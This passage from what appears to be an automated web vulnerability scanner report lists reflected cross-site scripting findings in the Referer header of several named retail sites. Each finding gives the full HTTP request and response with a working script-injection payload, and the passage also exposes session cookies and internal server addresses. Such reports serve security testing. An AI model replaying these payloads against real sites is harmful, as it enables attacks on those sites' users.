Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1jggedj1dsr60oqkfg0j29me01; split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; __utma=125179656.1641424039.1317384215.1317384215.1317384215.1; __utmc=125179656; __utmz=125179656.1317384215.1.1.utmccn=(referral)|utmcsr=mcafeesecure.com|utmcct=/us/forconsumers/mcafee_certified_sites.jsp|utmcmd=referral; __utmb=125179656

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:11:02 GMT
Server: Apache
X-server-addr: 192.168.100.222
X-trying: 192.168.100.2
X-mysql: 192.168.100.2
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Length: 68715
Content-Type: text/html; charset=utf-8

<html>
<head>
<title>Marvel Subscriptions - </title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod//i/content/outcss/1301082360-v3-i-css-subs.css" type="text/css" media="screen">
<script
...[SNIP]...
<!-- REFER http://www.google.com/search?hl=en&q=886f4--><script>alert(1)</script>98026709b0b !-->
...[SNIP]...

3.457. http://www.abesofmaine.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.abesofmaine.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 2a067<script>alert(1)</script>fd0070ec4fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.abesofmaine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=2a067<script>alert(1)</script>fd0070ec4fa

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:24:30 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-45590fe9=d89adda9:0; path=/
Content-Length: 34074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3
...[SNIP]...
<FONT COLOR="#ffffff">f:http://www.google.com/search?hl=en&q=2a067<script>alert(1)</script>fd0070ec4fa --f2:http://www.google.com/search?hl=en&q=2a067<script>
...[SNIP]...

3.458. http://www.abesofmaine.com/category.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.abesofmaine.com
Path:   /category.do

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1df85<script>alert(1)</script>77b71b79bed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category.do?group1=Televisions HTTP/1.1
Host: www.abesofmaine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=1df85<script>alert(1)</script>77b71b79bed
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=150C0F5AD67ECB7B292EE612F6C4A165; mbcc=676EA379-F0C8-59EC-AFE2-7BB8BFBA7057; mbcs=A5A36BBB-76A4-506C-0B69-FAFDA6CDBD37; __utma=11070564.628728169.1317385471.1317385471.1317385471.1; __utmb=11070564.1.10.1317385471; __utmc=11070564; __utmz=11070564.1317385471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-45590fe9=d89adda9:0

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:26:22 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-45590fe9=d89adda9:0; path=/
Content-Length: 32276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3
...[SNIP]...
<FONT COLOR="#ffffff">f:http://www.google.com/search?hl=en&q=1df85<script>alert(1)</script>77b71b79bed --f2:http://www.google.com/search?hl=en&q=1df85<script>
...[SNIP]...

3.459. https://www.abesofmaine.com/accountMenu.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.abesofmaine.com
Path:   /accountMenu.do

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 34631<script>alert(1)</script>53c335fa723 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /accountMenu.do HTTP/1.1
Host: www.abesofmaine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=34631<script>alert(1)</script>53c335fa723

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:50:49 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-45590fe9=d89adda9:0; path=/
Content-Length: 33311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3
...[SNIP]...
<FONT COLOR="#ffffff">f:http://www.google.com/search?hl=en&q=34631<script>alert(1)</script>53c335fa723 --f2:http://www.google.com/search?hl=en&q=34631<script>
...[SNIP]...

3.460. http://www.acehardware.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980a6"><script>alert(1)</script>dc697fbf2db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=980a6"><script>alert(1)</script>dc697fbf2db
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 110243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=980a6"><script>alert(1)</script>dc697fbf2db;ord=1;num=96019408?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.461. http://www.acehardware.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff80"><script>alert(1)</script>0470a887578 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=6ff80"><script>alert(1)</script>0470a887578
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:14 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 110243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6ff80"><script>alert(1)</script>0470a887578;ord=1;num=68574214?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.462. http://www.acehardware.com/product/close.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /product/close.gif

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68105"><script>alert(1)</script>fb9faf167fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /product/close.gif HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=68105"><script>alert(1)</script>fb9faf167fd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=TV08TFwJQn4kLBr1YWnfM0lTGbD7Lbc52gWg7Q1JDCmypR1rCbP8!822118078; browser_id=152599988183; __g_u=119394291772675_1_1_1_5_1317816201821_0; __utma=185450681.1831737622.1317384206.1317384206.1317384206.1; __utmb=185450681.1.10.1317384206; __utmc=185450681; __utmz=185450681.1317384206.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; rvdata=XR78594151175f471a0f4f1a175b0a0a0304; rvp=2870764:; fsr.s={"v":1,"rid":"1317384212786_773524","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://www.acehardware.com/home/index.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384258208}; s_pers=%20s_lastvisit%3D1317384205926%7C1411992205926%3B%20s_nr%3D1317384281381%7C1319976281381%3B%20gpv_p27%3DProduct%253A%25202870764%253A%2520Weber%2520Q%2520100%2520%2528386002%2529%7C1317386081421%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1317384286025; __g_c=c%3A119394291772675%7Cd%3A1%7Ca%3A1%7Cb%3A3%7Ce%3A1%7Cf%3A1%7Ch%3A0%7Cg%3A1

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:08:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 110213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=68105"><script>alert(1)</script>fb9faf167fd;ord=1;num=11630513?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.463. http://www.acehardware.com/product/loading.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /product/loading.gif

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 424af"><script>alert(1)</script>485c49130d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /product/loading.gif HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=424af"><script>alert(1)</script>485c49130d0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=TV08TFwJQn4kLBr1YWnfM0lTGbD7Lbc52gWg7Q1JDCmypR1rCbP8!822118078; browser_id=152599988183; __g_u=119394291772675_1_1_1_5_1317816201821_0; __utma=185450681.1831737622.1317384206.1317384206.1317384206.1; __utmb=185450681.1.10.1317384206; __utmc=185450681; __utmz=185450681.1317384206.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; rvdata=XR78594151175f471a0f4f1a175b0a0a0304; rvp=2870764:; fsr.s={"v":1,"rid":"1317384212786_773524","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://www.acehardware.com/home/index.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384258208}; s_pers=%20s_lastvisit%3D1317384205926%7C1411992205926%3B%20s_nr%3D1317384281381%7C1319976281381%3B%20gpv_p27%3DProduct%253A%25202870764%253A%2520Weber%2520Q%2520100%2520%2528386002%2529%7C1317386081421%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1317384286025; __g_c=c%3A119394291772675%7Cd%3A1%7Ca%3A1%7Cb%3A3%7Ce%3A1%7Cf%3A1%7Ch%3A0%7Cg%3A1

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:08:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 110213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=424af"><script>alert(1)</script>485c49130d0;ord=1;num=28922246?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.464. https://www.acehardware.com/acerewards/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /acerewards/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3955f"><script>alert(1)</script>7aa3a316c02 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /acerewards/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3955f"><script>alert(1)</script>7aa3a316c02

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:50:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZo
...[SNIP]...
<IFRAME SRC="https://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=acere759;u1=;u2=5;u3=;u4=;u5=http://www.google.com/search?hl=en&q=3955f"><script>alert(1)</script>7aa3a316c02;ord=1;num=79061433?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.465. http://www.gnc.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a28b"><script>alert(1)</script>7c72546d38e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=7a28b"><script>alert(1)</script>7c72546d38e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:31 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95917


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www
...[SNIP]...
<IFRAME src="https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=7a28b"><script>alert(1)</script>7c72546d38e;u6=;u7=;ord=1;num=20604940?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.466. http://www.gnc.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16387"><script>alert(1)</script>294dce3789b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=16387"><script>alert(1)</script>294dce3789b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:25 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95453


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www
...[SNIP]...
<IFRAME src="https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=16387"><script>alert(1)</script>294dce3789b;u6=;u7=;ord=1;num=58157000?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.467. http://www.pacificgeek.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pacificgeek.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload aac6f--><script>alert(1)</script>e175c626cd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.pacificgeek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=aac6f--><script>alert(1)</script>e175c626cd6

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 13:30:52 GMT
X-Powered-By: ASP.NET
Content-Length: 83898
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=aac6f--><script>alert(1)</script>e175c626cd6-->
...[SNIP]...

3.468. http://www.pacificgeek.com/product.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pacificgeek.com
Path:   /product.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 1e58b--><script>alert(1)</script>8dfeb600483 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /product.asp?id=99228&C=220&S=982 HTTP/1.1
Host: www.pacificgeek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=1e58b--><script>alert(1)</script>8dfeb600483
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
